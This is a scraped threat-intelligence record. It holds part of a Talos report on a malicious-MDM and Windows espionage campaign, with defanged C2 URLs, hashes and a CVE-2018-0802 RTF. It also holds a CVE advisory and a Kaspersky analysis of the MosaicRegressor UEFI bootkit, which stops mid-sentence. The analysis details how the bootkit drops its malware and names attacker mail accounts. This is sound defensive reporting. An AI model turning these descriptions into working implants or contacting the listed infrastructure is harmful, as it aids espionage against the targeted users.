[here](<https://www.virustotal.com/%23/url/a65bcd077ea0c098ae0bc88414a38f2cf4333cae40d704eb88dfa043819f70d7/details>) using hxxp://voguextra[.]com/decoy.doc. \n \nThe domains used during this campaign shared similarities with the domains used throughout the Bahamut campaign reported by Bellingcat. Most of the email addresses used within the domains were [*@mail.ru](<mailto:*@mail.ru>) email accounts, the C2s identified both used AES encrypted strings represented as base64 values, and the URI patterns used in both campaigns shared an almost identical syntax: \n\n \n \n repository + random.php + GET value \n /hdhfdhffjvfjd/gfdhghfdjhvbdfhj.php?p=1&g=[string]&v=N/A&s=[string]&t=[string] \n \n\nThe domains also had similar structures for the domain name (they are formatted [word]-[word]-[word]) across both campaigns. Actors tend to stick with similar structures, especially if they have had success in the past. \n \nOnce we started profiling the domains, we quickly noticed a strong link to India. With access to historical whois and hosting information, we were able to determine that the three MDM domains pointed to an Indian nexus. All three domains used a privacy proxy to register their domains. However, what the actor did not do was create nameservers upon registering the domains. This allowed us to discover that two of the three domains were registered with Indian registrars and hosting providers. \n \nThe three domains identified for MDM use were ios-update-whatsapp[.]com, ios-certificate-update[.]com and www[.]wpitcher[.]com. \n \n**ios-update-whatsapp[.]com** \n \nThe nameserver used initially was obox.dns[.]com, which is owned by the India-based Directi platform, is an Indian registrar and was the original nameservers used by this domain. This later changed to being [ns1-2].ios-update-whatsapp[.]com, which suggests this domain was potentially registered and purchased in India. \n \n**wpitcher[.]com** \n \nThis domain initially used nameservers related to the Indian company MantraGrid, an India-based cloud platform that shows another link to an Indian actor by using this as one of the original MDM domains we identified. \n \n**ios-certificate-update.com** \n \nThis domain used a similar structure to ios-update-whatsapp[.]com and also shared the same privacy proxy as the other two domains listed above relating to the MDM activity. This was one of the first registered domains and was using a bulletproof hosting platform in Panama. \n \nFinally, Bellingcat, via Tom Lancaster, identified similarities with a previous InPage campaign reported by [Kaspersky](<https://securelist.com/inpage-zero-day-exploit-used-to-attack-financial-institutions-in-asia/76717/>) which shows similar URI structuring, as well as victimology. The InPage attack targeted Urdu-speaking Muslims, which further increases the likelihood that the victims are Indian-based because Urdu is a dialect primarily spoken in India and Pakistan. With our attacker, we identified that the MDM was also taking advantage of an application called PrayTime \u2014 a popular app for Muslims that alerts them to complete their daily prayers. \n \nWith all of this taken into consideration, we assess with moderate confidence that the attacker is located in India. Additionally, we assess with low confidence that the campaign we discovered is linked to the Bahamut group. \n \n\n\n## Links with Windows-targeted campaigns\n\n \nTalos identified several malicious binaries that could be used to target victims running Microsoft Windows operating systems using the same infrastructure as the malicious app mentioned in our previous article, techwach.com. \n \nThe sample 6b62f4db64edf7edd648c38a563f44b656b0f6ad9a0e4e97f93cf9abfdfc63e5 contacts the following URL to download an additional payload from the following page: \n \n\n\n * hxxp://techwach[.]com/Beastwithtwobacks/Barkingupthewrongtree.php\n \nWe know that the MDM and the Windows services were up and running on the same C2 server in May 2018. The purpose of this malicious Windows binary is to get information on the infected device (username and hostname), send this information and retrieve an additional PE32 file if the operator estimates that the targeted system is relevant. \n \nWe found additional similar samples between June 2017 and June 2018 with different C2 servers. The attackers have two kinds of samples: one developed in Delphi and one developed in VisualBasic. \n \nHere are the Delphi samples: \n \n\n\n * b96fc53f321729eda24af2a0b95e5c1d39d46acbd5a565e6c5f8c81f1bf9c7a1 -> hxxp://appswonder[.]info\n * 3f463cebef1550b055ef6b4d1dad16ff1cb514f0091271ce92549e77bb5080d6 -> hxxp://referfile[.]com\n * 4b94b152293e49532e549b2538cad85e950cd16ccd948a47a632376a840626ed -> hxxp://hiltrox[.]com\n * e70a1c230ef2894363b834132bbdbb3a0edc88e81049a7c7774fa5b4ed78206b -> hxxp://scrollayer[.]com\n * e7701f81141dfd6234488e51340ba2d05901c8242a6e9a9952c297c52a3ff050 -> hxxp://twitck[.]com\n * e93f28efc1787ed5e8763cdc0417e7d5db1c9203e484350c64860fff91dab4f5 -> hxxp://scrollayer[.]com\n \nHere are the VisualBasic samples: \n \n\n\n * 6f362bc439ce09c7dcb0ac5cce84b81914b9dd1e9969cae8b570ade3af1cea3d -> hxxp://32player[.]com\n * ce0026e0eb3f4f1d3d2a003400f863900f497745f3384e430926d99206cc5ed6 -> hxxp://nfinx[.]info\n * d2c15c2043b0455cfad36f22f564b99ed46cea3891abb80eaf86093654c94dea -> hxxp://metclix[.]com/\n * d7f90e9b1129e3223a886422b3625399d52913dcc2757734a67422ac905683f7 -> hxxp://appswonder[.]info/ \nec973e4319f5a9e8e9c28d315e7bb8153a620baa8ae52b455b68400612aad1d1 -> hxxp://capsnit[.]com/\nSome of the C2 servers are still up and running at this time. The Apache setup is very specific, and perfectly matched the Apache setup of the malicious IPA apps. \n \nAdditionally, we identified the infection vector of one of the Windows malware. The attackers used a malicious RTF (a1f2018bd61989a78247df53d808b6b513d530c47b89f2a919c59c848e2a6ac4) abusing the CVE-2018-0802 vulnerability in order to drop and execute the last binary of the previously mentioned list. \n \nFinally, one of the VisualBasic binary was bundled in a msiexec file with this following decoy document: \n\n\n[![](https://3.bp.blogspot.com/-4HDJcicAXBE/W1bKn2yGiII/AAAAAAAAAf0/MbEcgjUj3s4k4SbkSrwEHuibuxyTUIokwCLcBGAs/s640/image2.png)](<https://3.bp.blogspot.com/-4HDJcicAXBE/W1bKn2yGiII/AAAAAAAAAf0/MbEcgjUj3s4k4SbkSrwEHuibuxyTUIokwCLcBGAs/s1600/image2.png>)\n\n \nThis decoy document is using a news story image found on the India Today newspaper website [here](<https://www.indiatoday.in/india/manipur/story/naga-peace-accord-nscn-im-muivah-greater-nagalim-967260-2017-03-23>), which is describing the Naga peace accord. The Indian targets in this campaign are likely very interested in this topic. \n \n\n\n## Conclusion\n\n \nSince researching our original blog post, we have discovered that an actor has been operating these malicious MDMs for many years. Based on previous research regarding the Bahamut group and our research, we believe the observed infrastructure is not limited to iOS targets, but is part of a broader framework that supports Apple iOS and Windows platforms. \n \nThis actor is likely located in India, given what we see in the technical elements. While the attacker's infrastructure throughout the entirety of the operation seems very similar to the one used by the Bahamut group, and they may even be connected, it is not possible to assert with high confidence that it is Bahamut at this time. \n \nThe use of a malicious MDM is convenient and the system is well-documented. Given the effectiveness of MDM abuse, it's likely that well-funded actors will continue to move into this area. \n \nBecause enrollment into the MDM requires user interaction and acceptance, it is crucial that they are aware of this type of threat and the dangers it can pose to their data and privacy. \n \nTalos will continue to keep an eye on MDM and similar infrastructures to ensure we are reporting the latest information and forcing the bad guys to innovate. \n \n\n\n## Coverage\n\n \nAdditional ways our customers can detect and block this threat are listed below. \n\n\n[![](https://2.bp.blogspot.com/-MpTd6_oGMi0/W1bKtntBNlI/AAAAAAAAAf8/Ycr2D6n2AuQGMhf425rVk6SyT8-IkhxogCLcBGAs/s320/image6.png)](<https://2.bp.blogspot.com/-MpTd6_oGMi0/W1bKtntBNlI/AAAAAAAAAf8/Ycr2D6n2AuQGMhf425rVk6SyT8-IkhxogCLcBGAs/s1600/image6.png>)\n\nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or[ Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as[ Next-Generation Firewall (](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)[NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)[NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ ](<https://meraki.cisco.com/products/appliances>)[Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection for all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on[ ](<https://www.snort.org/products>)[Snort.org](<https://www.snort.org/products>). \n \n\n\n## IOCs\n\n \niOS Applications \n \n\n\n * 422e4857614cc603f2388eb9a6b7bbe16d45b9fd0a9b752f02c107887cf8cb3e imo.ipa\n * e3ceec8676e2a1779b8289e341874209a448b11f3d81834a2faae9c494267602 Safari.ipa\n * bab7f61ed0f2b085c02ff1e4305ceab4479455d7b4cfba0a018b73ee955fcb51 Telegram.ipa\n * fbfaed75aa855c7db486edee15359b9f8c1b394b0b02f77b22500a90c53cb423 WhatsApp.ipa\n \nMDM Domain: \n \n\n\n * ios-update-whatsapp[.]com\n \nC2 Domains: \n \n\n\n * hytechmart[.]com\n \nPE32 Samples: \n \n\n\n * b96fc53f321729eda24af2a0b95e5c1d39d46acbd5a565e6c5f8c81f1bf9c7a1\n * 3f463cebef1550b055ef6b4d1dad16ff1cb514f0091271ce92549e77bb5080d6\n * 4b94b152293e49532e549b2538cad85e950cd16ccd948a47a632376a840626ed\n * e70a1c230ef2894363b834132bbdbb3a0edc88e81049a7c7774fa5b4ed78206b\n * e7701f81141dfd6234488e51340ba2d05901c8242a6e9a9952c297c52a3ff050\n * e93f28efc1787ed5e8763cdc0417e7d5db1c9203e484350c64860fff91dab4f5\n * 6f362bc439ce09c7dcb0ac5cce84b81914b9dd1e9969cae8b570ade3af1cea3d\n * ce0026e0eb3f4f1d3d2a003400f863900f497745f3384e430926d99206cc5ed6\n * d2c15c2043b0455cfad36f22f564b99ed46cea3891abb80eaf86093654c94dea\n * d7f90e9b1129e3223a886422b3625399d52913dcc2757734a67422ac905683f7\n * ec973e4319f5a9e8e9c28d315e7bb8153a620baa8ae52b455b68400612aad1d1\n \nPE32 C2 servers: \n \n\n\n * hxxp://appswonder[.]info\n * hxxp://referfile[.]com\n * hxxp://hiltrox[.]com\n * hxxp://scrollayer[.]com\n * hxxp://twitck[.]com\n * hxxp://scrollayer[.]com\n * hxxp://32player[.]com\n * hxxp://nfinx[.]info\n * hxxp://metclix[.]com/\n * hxxp://capsnit[.]com/\n \nMalicious RTF Samples: \n \n\n\n * a1f2018bd61989a78247df53d808b6b513d530c47b89f2a919c59c848e2a6ac4\n\n![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/-9jjaXrJwBo)", "published": "2018-07-24T22:24:00", "modified": "2018-07-25T11:53:23", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/-9jjaXrJwBo/Mobile-Malware-Campaign-uses-Malicious-MDM-Part2.html", "reporter": "noreply@blogger.com (Paul Rascagneres)", "references": [], "cvelist": ["CVE-2018-0802"], "lastseen": "2018-07-25T12:50:08", "viewCount": 749, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:6AB45633-1353-4F19-B0F2-33448E9488A2"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:5FC3EC6D315A733A8D566BD7A42A12FE"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0018"]}, {"type": "cve", "idList": ["CVE-2018-0802"]}, {"type": "fireeye", "idList": ["FIREEYE:96525D6EA5DBF734A371FB66EB02FA45", "FIREEYE:A819772457030262D1150428E2B4438C", "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD"]}, {"type": "kaspersky", "idList": ["KLA11170"]}, {"type": "krebs", "idList": ["KREBS:4F19DF7091060B198B092ABE2F7E1AA8"]}, {"type": "mscve", "idList": ["MS:CVE-2018-0802"]}, {"type": "mskb", "idList": ["KB4011574", "KB4011580", "KB4011607", "KB4011610", "KB4011643", "KB4011656", "KB4011659"]}, {"type": "mssecure", "idList": ["MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201892253", "MYHACK58:62201892510", "MYHACK58:62201994516"]}, {"type": "nessus", "idList": ["SMB_NT_MS18_JAN_OFFICE.NASL", "SMB_NT_MS18_JAN_OFFICE_COMPATIBILITY.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812607", "OPENVAS:1361412562310812614", "OPENVAS:1361412562310812618", "OPENVAS:1361412562310812623", "OPENVAS:1361412562310812624", "OPENVAS:1361412562310812708", "OPENVAS:1361412562310812730", "OPENVAS:1361412562310812731"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "securelist", "idList": ["SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "SECURELIST:AFE852637D783B450E3C6DA74A37A5AB", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:E9DB961C0B1E8B26B305F963059D717E", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "symantec", "idList": ["SMNTC-102347"]}, {"type": "talosblog", "idList": ["TALOSBLOG:EC1B279A70AF41A51CBB4EB4722EFA46"]}, {"type": "thn", "idList": ["THN:42E3306FC75881CF8EBD30FA8291FF29", "THN:75586AE52D0AAF674F942498C96A2F6A", "THN:8EAD85C313EF85BE8D38BAAD851B106E", "THN:ED087560040A02BCB1F68DE406A7F577"]}, {"type": "threatpost", "idList": ["THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "THREATPOST:63188D8C89FE469962D4F460E46755BC", "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "THREATPOST:A79D567955CD3BD88909060ECB743C9F"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034"]}]}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:6AB45633-1353-4F19-B0F2-33448E9488A2"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:5FC3EC6D315A733A8D566BD7A42A12FE"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0018"]}, {"type": "cve", "idList": ["CVE-2018-0802"]}, {"type": "fireeye", "idList": ["FIREEYE:96525D6EA5DBF734A371FB66EB02FA45"]}, {"type": "kaspersky", "idList": ["KLA11170"]}, {"type": "krebs", "idList": ["KREBS:4F19DF7091060B198B092ABE2F7E1AA8"]}, {"type": "mscve", "idList": ["MS:CVE-2018-0802"]}, {"type": "mskb", "idList": ["KB4011643"]}, {"type": "mssecure", "idList": ["MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201892253"]}, {"type": "nessus", "idList": ["SMB_NT_MS18_JAN_OFFICE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812607", "OPENVAS:1361412562310812614", "OPENVAS:1361412562310812618", "OPENVAS:1361412562310812623", "OPENVAS:1361412562310812624", "OPENVAS:1361412562310812708"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "securelist", "idList": ["SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2"]}, {"type": "talosblog", "idList": ["TALOSBLOG:EC1B279A70AF41A51CBB4EB4722EFA46"]}, {"type": "thn", "idList": ["THN:ED087560040A02BCB1F68DE406A7F577"]}, {"type": "threatpost", "idList": ["THREATPOST:63188D8C89FE469962D4F460E46755BC", "THREATPOST:A79D567955CD3BD88909060ECB743C9F"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2018-0802", "epss": "0.974950000", "percentile": "0.999510000", "modified": "2023-03-14"}], "vulnersScore": -0.1}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659988328, "score": 1683995128, "epss": 1678863173}, "_internal": {"score_hash": "55bffb6cd6bd8a98a0ca7015892c6e49"}}

{"checkpoint_advisories": [{"lastseen": "2021-12-17T11:31:36", "description": "A remote code execution vulnerability exists in Microsoft Office Equation Editor. The vulnerability is due to an error in the way Microsoft Office improperly handles objects in memory while parsing specially crafted files. A remote attacker can exploit this issue by enticing a victim to open a specially crafted file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-08T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Office Equation Memory Corruption Remote Code Execution (CVE-2018-0802)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0802"], "modified": "2018-02-25T00:00:00", "id": "CPAI-2018-0018", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2020-10-07T09:55:20", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/05091531/abstract_digital_mosaic-990x400.jpg)\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/04/16152111/pdf_icon_new.jpg) Part II. Technical details (PDF)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/07080558/MosaicRegressor_Technical-details.pdf>)\n\nUEFI (or Unified Extensible Firmware Interface) has become a prominent technology that is embedded within designated chips on modern day computer systems. Replacing the legacy BIOS, it is typically used to facilitate the machine's boot sequence and load the operating system, while using a feature-rich environment to do so. At the same time, it has become the target of threat actors to carry out exceptionally persistent attacks.\n\nOne such attack has become the subject of our research, where we found a compromised UEFI firmware image that contained a malicious implant. This implant served as means to deploy additional malware on the victim computers, one that we haven't come across thus far. To the best of our knowledge, this is the second known public case where malicious UEFI firmware in use by a threat actor was found in the wild.\n\nThroughout this blog we will elaborate on the following key findings:\n\n * We discovered rogue UEFI firmware images that were modified from their benign counterpart to incorporate several malicious modules;\n * The modules were used to drop malware on the victim machines. This malware was part of a wider malicious framework that we dubbed MosaicRegressor;\n * Components from that framework were discovered in a series of targeted attacks pointed towards diplomats and members of an NGO from Africa, Asia and Europe, all showing ties in their activity to North Korea;\n * Code artefacts in some of the framework's components and overlaps in C&C infrastructure used during the campaign suggest that a Chinese-speaking actor is behind these attacks, possibly having connections to groups using the Winnti backdoor;\n\nThe attack was found with the help of [Firmware Scanner](<https://www.kaspersky.com/enterprise-security/wiki-section/products/anti-rootkit-and-remediation-technology>), which has been integrated into Kaspersky products since the beginning of 2019. This technology was developed to specifically detect threats hiding in the ROM BIOS, including UEFI firmware images.\n\n## Current State of the Art\n\nBefore we dive deep into our findings, let us have a quick recap of what UEFI is and how it was leveraged for attacks thus far. In a nutshell, UEFI is a specification that constitutes the structure and operation of low-level platform firmware, so as to allow the operating system to interact with it at various stages of its activity.\n\nThis interaction happens most notably during the boot phase, where UEFI firmware facilitates the loading of the operating system itself. That said, it can also occur when the OS is already up and running, for example in order to update the firmware through a well-defined software interface.\n\nConsidering the above, UEFI firmware makes for a perfect mechanism of persistent malware storage. A sophisticated attacker can modify the firmware in order to have it deploy malicious code that will be run after the operating system is loaded. Moreover, since it is typically shipped within SPI flash storage that is soldered to the computer's motherboard, such implanted malware will be resistant to OS reinstallation or replacement of the hard drive. \nThis type of attack has occurred in several instances in the past few years. A prominent example is the LowJax implant [discovered](<https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/>) by our friends at ESET in 2018, in which patched UEFI modules of the LoJack anti-theft software (also known as Computrace) were used to deploy a malicious user mode agent in a number of Sofacy \\ Fancy Bear victim machines. The dangers of Computrace itself [were described](<https://securelist.com/absolute-computrace-revisited/58278/>) by our colleagues from the Global Research and Analysis Team (GReAT) back in 2014.\n\nAnother example is source code of a UEFI bootkit named VectorEDK which was discovered in the Hacking Team leaks from 2015. This code consisted of a set of UEFI modules that could be incorporated into the platform firmware in order to have it deploy a backdoor to the system which will be run when the OS loads, or redeploy it if it was wiped. Despite the fact that VectorEDK's code was made public and [can be found](<https://github.com/hackedteam/vector-edk>) in Github nowadays, we hadn't witnessed actual evidence of it in the wild, before our latest finding.\n\n## Our Discovery\n\nDuring an investigation, we came across several suspicious UEFI firmware images. A deeper inspection revealed that they contained four components that had an unusual proximity in their assigned GUID values, those were two DXE drivers and two UEFI applications. After further analysis we were able to determine that they were based on the leaked source code of HackingTeam's VectorEDK bootkit, with minor customizations.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01141821/sl_MosaicRegressor_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01141821/sl_MosaicRegressor_01.png>)\n\n**_Rogue components found within the compromised UEFI firmware_**\n\nThe goal of these added modules is to invoke a chain of events that would result in writing a malicious executable named 'IntelUpdate.exe' to the victim's Startup folder. Thus, when Windows is started the written malware would be invoked as well. Apart from that, the modules would ensure that if the malware file is removed from the disk, it will be rewritten. Since this logic is executed from the SPI flash, there is no way to avoid this process other than eliminating the malicious firmware.\n\nFollowing is an outline of the components that we revealed:\n\n * **SmmInterfaceBase**: a DXE driver that is based on Hacking Team's 'rkloader' component and intended to deploy further components of the bootkit for later execution. This is done by registering a callback that will be invoked upon an event of type EFI_EVENT_GROUP_READY_TO_BOOT. The event occurs at a point when control can be passed to the operating system's bootloader, effectively allowing the callback to take effect before it. The callback will in turn load and invoke the 'SmmAccessSub' component.\n * **Ntfs**: a driver written by Hacking Team that is used to detect and parse the NTFS file system in order to allow conducting file and directory operations on the disk.\n * **SmmReset**: a UEFI application intended to mark the firmware image as infected. This is done by setting the value of a variable named 'fTA' to a hard-coded GUID. The application is based on a component from the original Vector-EDK code base that is named 'ReSetfTA'.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01141941/sl_MosaicRegressor_02.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01141941/sl_MosaicRegressor_02.png>)\n\n**_ __Setting of the fTA variable with a predefined GUID to mark the execution of the bootkit_**\n\n * **SmmAccessSub: **the main bootkit component that serves as a persistent dropper for a user-mode malware. It is executed by the callback registered during the execution of 'SmmInterfaceBase', and takes care of writing a binary embedded within it as a file named 'IntelUpdate.exe' to the startup directory on disk. This allows the binary to execute when Windows is up and running. \nThis is the only proprietary component amongst the ones we inspected, which was mostly written from scratch and makes only slight use of code from a Vector-EDK application named 'fsbg'. It conducts the following actions to drop the intended file to disk:\n\n * Bootstraps pointers for the SystemTable, BootServices and RuntimeServices global structures.\n * Tries to get a handle to the currently loaded image by invoking the HandleProtocol method with the EFI_LOADED_IMAGE_PROTOCOL_GUID argument.\n * If the handle to the current image is obtained, the module attempts to find the root drive in which Windows is installed by enumerating all drives and checking that the '\\Windows\\System32' directory exists on them. A global EFI_FILE_PROTOCOL object that corresponds to the drive will be created at this point and referenced to open any further directories or files in this drive.\n * If the root drive is found in the previous stage, the module looks for a marker file named 'setupinf.log' under the Windows directory and proceeds only if it doesn't exist. In the absence of this file, it is created.\n * If the creation of 'setupinf.log' succeeds, the module goes on to check if the 'Users' directory exists under the same drive.\n * If the 'Users' directory exists, it writes the 'IntelUpdate.exe' file (embedded in the UEFI application's binary) under the 'ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup' directory in the root drive.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142051/sl_MosaicRegressor_03.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142051/sl_MosaicRegressor_03.png>)\n\n**_Code from 'SmmAccessSub' used to write the embedded 'IntelUpdate.exe' binary to the Windows Startup directory_**\n\nUnfortunately, we were not able to determine the exact infection vector that allowed the attackers to overwrite the original UEFI firmware. Our detection logs show that the firmware itself was found to be malicious, but no suspicious events preceded it. Due to this, we can only speculate how the infection could have happened.\n\nOne option is through physical access to the victim's machine. This could be partially based on Hacking Team's leaked material, according to which the installation of firmware infected with VectorEDK requires booting the target machine from a USB key. Such a USB would contain a special update utility that can be generated with a designated builder provided by the company. We found a Q-flash update utility in our inspected firmware, which could have been used for such a purpose as well.\n\nFurthermore, the leaks reveal that the UEFI infection capability (which is referred to by Hacking Team as 'persistent installation') was tested on ASUS X550C laptops. These make use of UEFI firmware by AMI which is very similar to the one we inspected. For this reason we can assume that Hacking Team's method of patching the firmware would work in our case as well.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142215/sl_MosaicRegressor_04.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142215/sl_MosaicRegressor_04.png>)\n\n**_Excerpt from a Hacking Team manual for deployment of infected UEFI firmware, also known as 'persistent installation'_**\n\nOf course, we cannot exclude other possibilities whereby rogue firmware was pushed remotely, perhaps through a compromised update mechanism. Such a scenario would typically require exploiting vulnerabilities in the BIOS update authentication process. While this could be the case, we don't have any evidence to support it.\n\n## The Bigger Picture: Enter MosaicRegressor Framework\n\nWhile Hacking Team's original bootkit was used to write one of the company's backdoors to disk, known as 'Soldier', 'Scout' or 'Elite', the UEFI implant we investigated deployed a new piece of malware that we haven't seen thus far. We decided to look for similar samples that share strings and implementation traits with the dropped binary. Consequently, the samples that we found suggested that the dropped malware was only one variant derived from a wider framework that we named MosaicRegressor.\n\nMosaicRegressor is a multi-stage and modular framework aimed at espionage and data gathering. It consists of downloaders, and occasionally multiple intermediate loaders, that are intended to fetch and execute payload on victim machines. The fact that the framework consists of multiple modules assists the attackers to conceal the wider framework from analysis, and deploy components to target machines only on demand. Indeed, we were able to obtain only a handful of payload components during our investigation.\n\nThe downloader components of MosaicRegressor are composed of common business logic, whereby the implants contact a C&C, download further DLLs from it and then load and invoke specific export functions from them. The execution of the downloaded modules usually results in output that can be in turn issued back to the C&C.\n\nHaving said that, the various downloaders we observed made use of different communication mechanisms when contacting their C&Cs:\n\n * CURL library (HTTP/HTTPS)\n * BITS transfer interface\n * WinHTTP API\n * POP3S/SMTPS/IMAPS, payloads transferred in e-mail messages\n\nThe last variant in the list is distinct for its use of e-mail boxes to host the requested payload. The payload intended to run by this implant can also generate an output upon invocation, which can be later forwarded to a 'feedback' mail address, where it will likely be collected by the attackers.\n\nThe mail boxes used for this purpose reside on the 'mail.ru' domain, and are accessed using credentials that are hard-coded in the malware's binary. To fetch the requested file from the target inbox, MailReg enters an infinite loop where it tries to connect to the "pop.mail.ru" server every 20 minutes, and makes use of the first pair of credentials that allow a successful connection. The e-mails used for login (without their passwords) and corresponding feedback mail are specified in the table below:\n\n**Login mail** | **Feedback mail** \n---|--- \nthtgoolnc@mail.ru | thgetmmun@mail.ru \nthbububugyhb85@mail.ru | thyhujubnmtt67@mail.ru \n \nThe downloaders can also be split in two distinct types, the "plain" one just fetching the payload, and the "extended" version that also collects system information:\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142407/sl_MosaicRegressor_05.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142407/sl_MosaicRegressor_05.png>)\n\n**_Structure of the log file written by BitsRegEx, strings marked in red are the original fields that appear in that file_**\n\nWe were able to obtain only one variant of the subsequent stage, that installs in the autorun registry values and acts as another loader for the components that are supposed to be fetched by the initial downloader. These components are also just intermediate loaders for the next stage DLLs. Ultimately, there is no concrete business logic in the persistent components, as it is provided by the C&C server in a form of 